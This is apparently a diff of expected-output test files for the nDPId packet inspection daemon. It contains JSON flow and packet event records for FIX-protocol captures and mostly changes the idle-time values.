+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
+00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1493755116662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1493755116662,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB9Lt9AAEAGGv\/AqAAU2cBWINBSD6AX7aSPaKnW31AYhgAmIwAAOD1GSVhDT01QATk9NzABeJwFwTsKgEAMBFByIJeZJMN+IK2wN7C1sbPx\/oXvjTr31bLRZgEpCxUsskD1SJOXgx2CH5xLY4WM9Hru7zWiKNkP3UcN1g=="} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1493755116788,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1493755116788,"pkt":"THK5MeMlACJNe\/gxCABFAAAo0h4AAC8GyRTZwFYgwKgAFA+g0FJoqdbfF+2k5FAQRRid0QAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1493755117668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755117668,"pkt":"THK5MeMlACJNe\/gxCABFAABb6MoAAPUG\/eUIERYfwKgAFA+gn+AbjTX8bvFE4oAY\/\/8xhAAAAQEICsq+R3VyD9Q7OD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} +00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1493755117668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755117668,"pkt":"ACJNe\/gxTHK5MeMlCABFAACK1yxAAEAGhFXAqAAUCBEWH5\/gD6Bu8UTiG402I4AY\/+CkEwAAAQEICnIP3\/PKvkd1OD1GSVhDT01QATk9NzEBeJwFwbENgDAMBEB5IKJ\/Ow5OpG+R2ICWho6G\/QvuSsd5td5oU0BPixQsusCsLEuXgzsSvnGurBXDSNdzf68R4gj7Ad5tDd0="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1493755117687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755117687,"pkt":"THK5MeMlACJNe\/gxCABFAAA09L8AAPUG8hcIERYfwKgAFA+gn+AbjTYjbvFFOIAQ\/\/9+KwAAAQEICsq+R4lyD9\/z"} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":456,"flow_first_seen":1493755109301,"flow_last_seen":1493755132102,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":14279,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1493755109440,"flow_last_seen":1493755131870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1493755110328,"flow_last_seen":1493755132019,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":920,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1493755117668,"flow_last_seen":1493755127687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755116662,"flow_last_seen":1493755126832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":222,"flow_first_seen":1493755109242,"flow_last_seen":1493755131889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":9909,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109301,"flow_last_seen":1493755128771,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":40,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109654,"flow_last_seen":1493755129718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":401,"flow_first_seen":1493755109264,"flow_last_seen":1493755132120,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":8240,"flow_avg_l4_payload_len":20,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755111956,"flow_last_seen":1493755132007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1493755110320,"flow_last_seen":1493755130355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":647,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755113353,"flow_last_seen":1493755123449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","packets-captured":1261,"packets-processed":1261,"total-skipped-flows":0,"total-l4-data-len":37586,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":12,"total-idle-flows":12,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":75,"global_ts_msec":1493755132120} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 
1261/1261 diff --git a/test/results/fix2.pcap.out b/test/results/fix2.pcap.out index 5518b6e45..82733606c 100644 --- a/test/results/fix2.pcap.out +++ b/test/results/fix2.pcap.out 
@@ -1,17 +1,17 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"fix2.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fix2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614758889587} -00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614758889588,"flow_last_seen":1614758889588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614758889588,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614758889588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889588,"pkt":"5kBKB+riApXG95NLCABFAAAweTwAAIAGAAAKZQACCmYAAoiSBAAt1D8pAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614758889589,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAweT0AAIAGAAAKZQACCmYACYiTBAAt1EIqAAAAAHACgAEU+AAAAgQFtAMDAQA="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"WgXZu6TVApXG95WRCABFAAAweT4AAIAGrLsKZgACCmUAAgQAiJIt1EL8LdQ\/KnASgAGE3gAAAgQFtAMDAQA="} 
-00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAoeT4AAIAGAAAKZQACCmYAAoiSBAAt1D8qLdRC\/VAQgAEU6QAAAAAAAAAA"} -00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889588,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"WgXZu6TVApXG95WRCABFAAAweT8AAIAGrLMKZgAJCmUAAgQAiJMt1EWWLdRCK3ASgAF\/OwAAAgQFtAMDAQA="} 
-00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAoeUAAAIAGAAAKZQACCmYACYiTBAAt1EIrLdRFl1AQgAEU8AAAAAAAAAAA"} -00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889589,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1987,"flow_first_seen":1614758889588,"flow_last_seen":1614758889595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":39543,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
-00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1059,"flow_first_seen":1614758889589,"flow_last_seen":1614758889595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":28413,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614758889588,"flow_last_seen":1614758889588,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614758889588,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614758889588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889588,"pkt":"5kBKB+riApXG95NLCABFAAAweTwAAIAGAAAKZQACCmYAAoiSBAAt1D8pAAAAAHACgAEU8QAAAgQFtAMDAQA="} 
+00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614758889589,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAweT0AAIAGAAAKZQACCmYACYiTBAAt1EIqAAAAAHACgAEU+AAAAgQFtAMDAQA="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"WgXZu6TVApXG95WRCABFAAAweT4AAIAGrLsKZgACCmUAAgQAiJIt1EL8LdQ\/KnASgAGE3gAAAgQFtAMDAQA="} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAoeT4AAIAGAAAKZQACCmYAAoiSBAAt1D8qLdRC\/VAQgAEU6QAAAAAAAAAA"} 
+00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889588,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"WgXZu6TVApXG95WRCABFAAAweT8AAIAGrLMKZgAJCmUAAgQAiJMt1EWWLdRCK3ASgAF\/OwAAAgQFtAMDAQA="} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAoeUAAAIAGAAAKZQACCmYACYiTBAAt1EIrLdRFl1AQgAEU8AAAAAAAAAAA"} 
+00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889589,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 